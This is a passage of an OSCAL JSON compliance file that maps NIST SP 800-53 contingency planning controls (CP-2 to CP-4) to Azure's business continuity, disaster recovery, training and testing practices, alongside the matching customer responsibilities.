statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"805436c6-310b-4fcd-a6ed-d2c9099a37ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.c","by-components":[{"uuid":"bfdeaf29-b5a5-4dde-9a2c-510ad58f5ea2","export":{"provided":[{"uuid":"fad4929b-c91c-46ad-9b8a-268d8d125eb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-008"}],"description":"Microsoft coordinates contingency planning with incident handling for Azure services as defined in the Azure Incident Management Standard Operating Procedure (SOP). Security and availability incidents are closely intertwined with business continuity and disaster recovery processes."}],"responsibilities":[{"uuid":"17150e6e-d26d-44fc-ba91-dfdb9158df8a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for coordinating contingency planning with incident handling.","provided-uuid":"fad4929b-c91c-46ad-9b8a-268d8d125eb4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"570d3602-3462-468f-8047-6bd0ed9a351d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.d","by-components":[{"uuid":"14ba47b2-6a71-4a9d-83de-1851d6d8aaad","export":{"provided":[{"uuid":"f3306d78-4a41-437b-adbe-168d8dba170a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-009"}],"description":"Microsoft reviews the BCP and DRP for Azure services by following the policies defined in the Azure Business Continuity and Disaster Recovery SOP. These polices ensure plans are reviewed on at least on an annual basis by the Azure BCM team. Service teams are required to revalidate the BCDR Program section of the Azure Global Portal on an annual basis as well. Any service team contingency plans not meeting Azure standards are rejected for re-work and have to be resubmitted."}],"responsibilities":[{"uuid":"9bc5af80-2fd6-4754-bf25-f979b645e1c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing the contingency plan.","provided-uuid":"f3306d78-4a41-437b-adbe-168d8dba170a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c21057c7-a133-4f0b-a7f0-f62c7b4a8022","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.e","by-components":[{"uuid":"fdf1e04b-bf92-470c-ad71-edf62eb77c2b","export":{"provided":[{"uuid":"07f7e9a6-67e6-4fb5-b385-85e1e362025f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-010"}],"description":"Microsoft updates the BCP and DRP on an annual basis and to address changes to the organization, information system, or environment of operation and problems encountered during plan implementation, execution, or testing. Reviews are conducted by the Azure BCM team, following the policies defined in the Azure Business Continuity and Disaster Recovery SOP. Service teams are required to revalidate the BCDR Program section of the Azure Global Portal on an annual basis as well. Any service team contingency plans not meeting Azure standards are rejected for re-work and have to be resubmitted."}],"responsibilities":[{"uuid":"84aa770c-640b-4226-9cf9-ccefca8b757f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for updating the contingency plan and how those updates reflect changes to the organization, resources, or environment of operation; and the problems encountered during implementation, execution, or testing of contingency activities.","provided-uuid":"07f7e9a6-67e6-4fb5-b385-85e1e362025f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7b67b310-8633-4b86-bf52-762e79dcced7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.f","by-components":[{"uuid":"89aa781d-7509-4666-aa93-e2214ba4ecdb","export":{"provided":[{"uuid":"c503bf74-7310-4e79-8787-165bf41201da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-011"}],"description":"Microsoft updates all plans for Azure services, following the policies defined in tAzure Business Continuity and Disaster Recovery SOP, including notifications to personnel via email, SharePoint, the BCDR Program in the Azure Global Portal, and service-team-specific notifications."}],"responsibilities":[{"uuid":"88100026-6c1e-4995-b42c-7a42724914c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for communicating changes made to the contingency plan.","provided-uuid":"c503bf74-7310-4e79-8787-165bf41201da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f78071fa-c155-4850-8605-fbf3e03dc1ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.g","by-components":[{"uuid":"0eda02f0-03d8-4540-972d-346166d55396","export":{"provided":[{"uuid":"9a0f55d1-dcd9-4e40-a41d-17130ee32a2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-012"}],"description":"Microsoft updates the BCP and DRP on an annual basis and to address changes to the organization, information system, or environment of operation and problems encountered during plan implementation, execution, or testing. Reviews are conducted by the Azure BCM team, following the policies defined in the Azure Business Continuity and Disaster Recovery SOP. Service teams are required to revalidate the BCDR Program section of the Azure Global Portal on an annual basis as well. Any service team contingency plans not meeting Azure standards are rejected for re-work and have to be resubmitted. Service teams are responsible for onboarding to BCDR Manager. Lessons learned from BCDR assessments are incorporated for future testing by service teams."}],"responsibilities":[{"uuid":"21137262-edf6-4d62-b96c-ecdfff226b0a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-012"}],"description":"The customer is responsible for incorporating lessons learned from contingency plan testing, training, or actual contingency activities into contingency testing and training for customer-deployed resources.","provided-uuid":"9a0f55d1-dcd9-4e40-a41d-17130ee32a2d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"549bdefb-9202-4087-be1e-3492757c2c07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.h","by-components":[{"uuid":"28370a27-6b2e-49a8-8c8a-e0ecd901ba79","export":{"provided":[{"uuid":"d9a04e11-6106-43c5-8af8-58f5f9cd0621","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-013"}],"description":"Microsoft protects the DRP, BCP, and service-specific plans for Azure services from unauthorized disclosure and modification. This is accomplished using SharePoint and Azure Global Portal access controls. Training and the Employee Agreement protect against the disclosure of information by Azure personnel."}],"responsibilities":[{"uuid":"334aabd8-c35d-449d-beb0-7d07152d2edc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting the contingency plan to prevent unauthorized disclosure or modification of the plan.","provided-uuid":"d9a04e11-6106-43c5-8af8-58f5f9cd0621"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d71c45ff-0155-4bb1-93dd-2ce93acb60cb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.1","statements":[{"uuid":"95b5be15-439f-4190-90a5-6fc616eb93fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.1_smt","by-components":[{"uuid":"0361ebb3-2d35-46cc-bf6e-edfb08a0ae0d","export":{"provided":[{"uuid":"de8e264f-0e0b-48bb-9742-2f3554f3b2f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-014"}],"description":"Following Microsoft's Enterprise Business Continuity Management (EBCM) methodology, Azure has implemented the Azure Business Continuity Plan (BCP) and Azure Disaster Recovery Plan (DRP) which provide guidance and detailed procedures for recovery of Azure business operations. These documents address the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations providing support for the security of Azure. The business continuity process contains a strategy for the recovery of Azure assets and the resumption of key Azure business processes. These contingency planning procedures are in accordance with NIST SP 800-34 Rev. 1, Contingency Planning Guide for Federal Information Systems. Additionally, Azure has created the Incident Management SOP, which supports and leveraged by the Azure BCP, DRP, and contingency planning procedures specific to Azure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8e6b170c-7378-4925-bf57-f6e7ff2928d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-014"}],"description":"The customer is responsible for coordinating contingency plan development with organizational elements responsible for related plans (e.g., business continuity, disaster recovery).","provided-uuid":"de8e264f-0e0b-48bb-9742-2f3554f3b2f1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e4cb3144-14c2-42da-af00-1efac23afaa2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.2","statements":[{"uuid":"bee87d50-4049-486d-8611-4d809a59901d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.2_smt","by-components":[{"uuid":"68e897ac-ee1e-4128-a7b5-e1d427fed902","export":{"provided":[{"uuid":"1fa3f1ee-f38c-4393-8d01-25a97bce2928","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-015"}],"description":"Azure implements a capacity planning process that ensures adequate resources are available for the Azure environment. The capacity management process includes the determination of the overall size, performance and resilience of the system. The capacity management process includes the following activities:_x000D_ _x000D_ * Understanding the current demands and forecasting the future requirements_x000D_ * Monitoring performance and throughput of services and supporting infrastructure components_x000D_ * Carry out tuning activities to ensure efficient utilization of available resources_x000D_ * Establishing and enforcing the policy for platform services contingency capacity buffer_x000D_ _x000D_"}],"responsibilities":[{"uuid":"989941e4-1213-402b-8908-ce4530de8c27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-015"}],"description":"The customer is responsible for conducting capacity planning to ensure customer-deployed resources continue operating during contingency activities. Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support continued system operation during contingency activities.","provided-uuid":"1fa3f1ee-f38c-4393-8d01-25a97bce2928"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0f5cd086-9236-4208-a512-244095dc7840","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.3","statements":[{"uuid":"b0192400-1419-4364-a453-b77606edd31c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.3_smt","by-components":[{"uuid":"159aa43d-3bca-48ff-8d67-9fade3e578bd","export":{"provided":[{"uuid":"751634ea-8b18-4a63-809f-260f603df8c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-016"}],"description":"Azure plans for the resumption of essential services within each service's Recovery Time Objective (RTO) defined by the Business Impact Analysis (BIA) within the service-specific plans. Essential services are defined as those with an RTO of 168 hours or less._x000D_ _x000D_"}],"responsibilities":[{"uuid":"693f591e-9a30-4114-986c-9f523c9bb82e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-016"}],"description":"The customer is responsible for resuming essential mission and business functions once contingency activities have commenced. Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support continued system operation during contingency activities.","provided-uuid":"751634ea-8b18-4a63-809f-260f603df8c9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fce6bb93-f36c-4d3e-854e-11506195cf8a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.5","statements":[{"uuid":"624cdf2f-7642-48d6-b834-3bee5f367232","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.5_smt","by-components":[{"uuid":"83de037a-0cab-481c-a951-b10b2703f4dd","export":{"provided":[{"uuid":"efe577b8-c9ba-462f-b49f-01c77bcebe6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-017"}],"description":"Azure plans for the continuance of essential missions and business functions by establishing alternate storage and processing sites at geographically distributed Azure datacenters. Data is replicated between primary and alternate sites automatically, depending on the region recovery classification of the service. Azure does not consider any given datacenter or region as alternate - all sites are equally primary, and services determine the level of resiliency required. All sites have equivalent physical and logical security safeguards._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d1bb5b1a-4744-415d-b3ef-e9cf50e4f861","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-017"}],"description":"The customer is responsible for continuing essential mission and business functions with little or no loss of operational continuity and sustain that continuity until full resource restoration has occurred at primary processing and/or storage sites for all customer-deployed resources. Microsoft Azure can support continued system operation during contingency activities if the customer configures Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"efe577b8-c9ba-462f-b49f-01c77bcebe6a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"249ac414-99be-4532-b281-c9992c30612a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.8","statements":[{"uuid":"a1ae80e1-7599-4d0c-bb26-d8a365b952a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.8_smt","by-components":[{"uuid":"b99ade44-bc2f-48ab-b2b5-f4dbceb43cda","export":{"provided":[{"uuid":"25057f13-9779-45d6-af03-451853913f64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-018"}],"description":"Azure establishes recovery time objectives (RTO) for all Azure services and documents those RTOs as part of the BCM process. Essential services are defined as those with an RTO of 168 hours or less._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8d9eb4e3-61b7-4c5a-9884-24513809c12d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-018"}],"description":"The customer is responsible for identifying critical customer-deployed resources.","provided-uuid":"25057f13-9779-45d6-af03-451853913f64"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cb793a5a-a3bc-45c2-8264-7abe9e3731e7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-3","statements":[{"uuid":"f0a4ddf4-6667-48c8-8916-c339e231f93a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-3_smt.a","by-components":[{"uuid":"381bb541-c022-4490-8916-ca43680847d9","export":{"provided":[{"uuid":"bfc2a374-d1f5-4e52-b033-f2f68d172cd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-019"}],"description":"Within ten (10) days of personnel taking on contingency roles and responsibilities, Azure ensures that required contingency training takes place. All personnel with a contingency planning role receive training on an annual basis, defined as a rolling three hundred and sixty five (365) days from the last training date. Upon completion of the training, personnel certify that they have been trained electronically and the training is stored and managed automatically by the BCDR Program training tool in the Azure Global Portal. The process is documented in the Azure BCDR Training and Awareness SOP. Evidence of training is stored in BCDR Program training tool in the Azure Global Portal._x000D_ _x000D_"}],"responsibilities":[{"uuid":"34e14e07-886d-49e0-9c68-7dccc45e4b99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-019"}],"description":"The customer is responsible for providing contingency training to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"bfc2a374-d1f5-4e52-b033-f2f68d172cd7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2965ab58-b784-4efa-bbcc-34a089b379d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-3_smt.b","by-components":[{"uuid":"6d5a6d15-36e7-4ca3-94a2-232bd54a4ea7","export":{"provided":[{"uuid":"5519358e-28c5-4de3-a05f-3bd6b39b3add","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-020"}],"description":"Service team BCP owners and crisis communications managers receive training by participating in simulated events, including regular recovery testing and disaster recovery drills, as well as the training course within the BCDR Program training tool in the Azure Global Portal. This training occurs at least annually and prior to assuming a contingency-related role, as well as whenever system changes occur._x000D_ _x000D_"}],"responsibilities":[{"uuid":"675b1623-e94d-4c80-95d9-177a71e346e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-020"}],"description":"The customer is responsible for providing contingency retraining to users of customer-deployed resources, when changes occur, in accordance with assigned roles and responsibilities","provided-uuid":"5519358e-28c5-4de3-a05f-3bd6b39b3add"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1778ab99-57a4-4be3-82cb-3a69364d5ae0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-3.1","statements":[{"uuid":"6606824a-aa54-4692-a9aa-443aa91eca1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-3.1_smt","by-components":[{"uuid":"70d04e20-abd8-485d-8def-435b787f3383","export":{"provided":[{"uuid":"5898846e-0899-4e35-91b4-bd1ca04101dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-021"}],"description":"Azure includes live-site exercises and functional failover tests in training for personnel with contingency planning and recovery responsibilities. The objective of these exercises is to maximize plan accuracy and team preparedness to respond to incidents. Microsoft injects faults during testing to ensure successful recovery, allowing teams to respond to simulated incidents._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fb9a724c-1828-4222-aec8-efbaaa477fcf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-021"}],"description":"The customer is responsible for facilitating effective response by personnel in crisis situations by incorporating simulated events into contingency training.","provided-uuid":"5898846e-0899-4e35-91b4-bd1ca04101dc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7b9f97be-859f-498a-b0ba-950bc1cf3e8c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-4","statements":[{"uuid":"d495d897-9200-4f5c-a54b-de8596f21488","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-022"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4_smt.a","by-components":[{"uuid":"d6e7caff-635e-48df-b137-b8c4ae729f1d","export":{"provided":[{"uuid":"8f1b2f53-8fde-4802-b890-7c00c557e24b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-022"}],"description":"The BCDR Team coordinates with the Drill team who schedules end-to-end recovery tests, drives execution of the tests, identifies recovery gaps, and communicates test results. At least one major end-to-end scenario at the datacenter level, including shutdown of all core mission critical services in a real-life scenario, is tested annually._x000D_ _x000D_ In addition, each service team performs tests to exercise their scenario listed in the Azure BCP and DRP annually. These include every component and critical process listed in the Azure BCP and DRP. Also, functional exercises are completed in real time on an ongoing basis as incidents occur._x000D_ _x000D_"}],"responsibilities":[{"uuid":"09f2a52c-09ed-4448-ae84-18462ab17da1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-022"}],"description":"The customer is responsible for testing the contingency plan for customer-deployed resources.","provided-uuid":"8f1b2f53-8fde-4802-b890-7c00c557e24b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3a8c1ba9-22bf-498f-89cc-b8955213445f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-023"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4_smt.b","by-components":[{"uuid":"c79dc834-73ab-4546-8fb6-bbc2d6addb50","export":{"provided":[{"uuid":"6e3caee3-d6b7-4994-a8bc-6ab005d542f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-023"}],"description":"Service teams create testing reports for all BCDR tests, are reviewed by the BCDR team, and entered into the BCDR Program in the Azure Global Portal. The BCDR team ensures that testing happens as per the defined schedule._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ece8bb19-0b1b-4746-aa57-a6a116184b78","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-023"}],"description":"The customer is responsible for reviewing the results of contingency plan testing (see CP-04.a).","provided-uuid":"6e3caee3-d6b7-4994-a8bc-6ab005d542f8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"909bad66-7dd8-455d-934c-26e97f56a7b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-024"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4_smt.c","by-components":[{"uuid":"27174e98-e106-4181-862b-c2b4b608869b","export":{"provided":[{"uuid":"52f88a52-754c-4849-92c7-389d8f22e648","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-024"}],"description":"As a result of the testing performed, the Drill team, in conjunction with the BCDR team and service teams, reviews supporting evidence documented in the BCDR Program in the Azure Global Portal and in work items in Azure DevOps and identifies improvement opportunities for short, medium, and long-term follow-up. If critical issues are identified during an exercise, they are worked on until resolution, and BCDR documentation is updated accordingly as needed. The overall readiness of the BCP and DRP includes the readiness to execute the plan per the test results._x000D_ _x000D_ Azure assesses the effects on organizational operations and assets for every test exercise. The appropriate service team updates BCDR documentation for any issue identified._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7f486f53-26ac-47b3-83e7-1ee7d87bf927","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-024"}],"description":"The customer is responsible for initiating corrective action regarding contingency plan testing.","provided-uuid":"52f88a52-754c-4849-92c7-389d8f22e648"}]},"description":"See inheritance and customer responsibility 